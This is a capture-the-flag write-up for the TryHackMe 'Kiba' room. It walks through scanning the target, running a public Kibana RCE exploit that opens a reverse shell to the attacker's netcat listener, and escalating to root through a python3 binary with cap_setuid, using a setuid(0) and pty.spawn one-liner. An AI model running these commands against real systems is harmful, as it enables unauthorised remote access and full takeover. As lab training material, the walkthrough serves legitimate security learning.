Kiba

THM writeup for exploiting Kibana RCE

Target Details

Target IP: 10.10.252.150

Scan Target

• Run Usual Nmap scan command

$ nmap -sCV -Pn -oN nmap.txt 10.10.252.150
$ cat nmap.txt
Nmap scan report for 10.10.252.150
Host is up (0.39s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9df8d157132481b6185d048ed2384f90 (RSA)
|   256 e1e67aa1a11cbe03d24e271b0d0aecb1 (ECDSA)
|_  256 2abae5c5fb51381745e7b154caa1a3fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 15 12:19:16 2023 -- 1 IP address (1 host up) scanned in 114.46 seconds

• Nmap didn't captured other open ports. since we know the room is related to kibana, we can search for it kibana port. After quick search, We can find that kibana runs on port: 5601

• Hosted Services Summary

Port	Service
22	Open SSH service
80	Apache Web Server
5601	Kibana

Navigating Kibana

Visit Kibana Dashboard hosted on http://10.10.252.150:5601

Kibana Dashboard

• We're logged in as default user. and Management tab seems interesting.

• Navigate to management tab

Found Version

Searching for Kibana Vulnerabilities and Exploits

• Search for kibana exploits on your favorite search engine

• Found vulnerability with RCE details hosted on tenable.

Exploit Details on Tenable

• On Reading Analysis we find that P{REDACTED} P{REDACTION} vulnerability was exploited to gain reverse shell.

Exploiting Kibana RCE Vuln

• Exploit Script link can also be found on the tenable page.

• Clone Github repo

• To use the script with python3 change content.data -> content.data.decode('utf-8')

• Start netcat listener to catch Reverse Shell.

nc -nlvp 1234

• Run exploit

./CVE-XXXX-XXXX-kibana-rce.py -u http://10.10.252.150:5601 -host [YOUR_THM_IP] -p 1234 --shell

• Now, we've successfully received reverse shell on our machine

$ nc -nlvp 1234
Connection from 10.10.252.150:34696
bash: cannot set terminal process group (942): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kiba@ubuntu:/home/kiba/kibana/bin$

Capturing Flags

• Get user.txt flag

kiba@ubuntu:/home/kiba/kibana/bin$ cd ~
kiba@ubuntu:/home/kiba$ ls
elasticsearch-6.5.4.deb  kibana  user.txt
kiba@ubuntu:/home/kiba$ cat user.txt
cat user.txt
THM{REDACTED}
kiba@ubuntu:/home/kiba$

• On quickly searching for how to get capabilities list ubuntu. I found the useful command. Execute on captured shell.

$ getcap -r /
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

• .hackmeplease is providing us hint that we need to use python3binary. On researching cap_setuid+ep permission allows to set uid.

• If we set uid to 0 using python they we'll be able to run python commands and spawn a shell. python os module can be used to set uid.

/home/kiba/.hackmeplease/python3 -c "import os,pty; os.setuid(0); pty.spawn('/bin/bash');"

• Read root flag

root@ubuntu# cat /root/root.txt
THM{REDACTED}